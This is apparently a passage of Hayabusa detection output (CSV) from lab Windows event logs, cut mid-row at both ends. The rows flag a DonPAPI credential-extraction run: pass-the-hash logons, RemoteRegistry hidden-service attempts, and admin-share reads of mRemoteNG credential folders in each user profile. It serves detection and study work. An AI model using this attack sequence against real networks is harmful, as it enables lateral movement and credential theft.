Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724dd2 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724e0b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 
0x8724e0b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.868 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.884 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724e0b | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ead,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ead,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.931 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.946 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ead | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.982 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.998 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 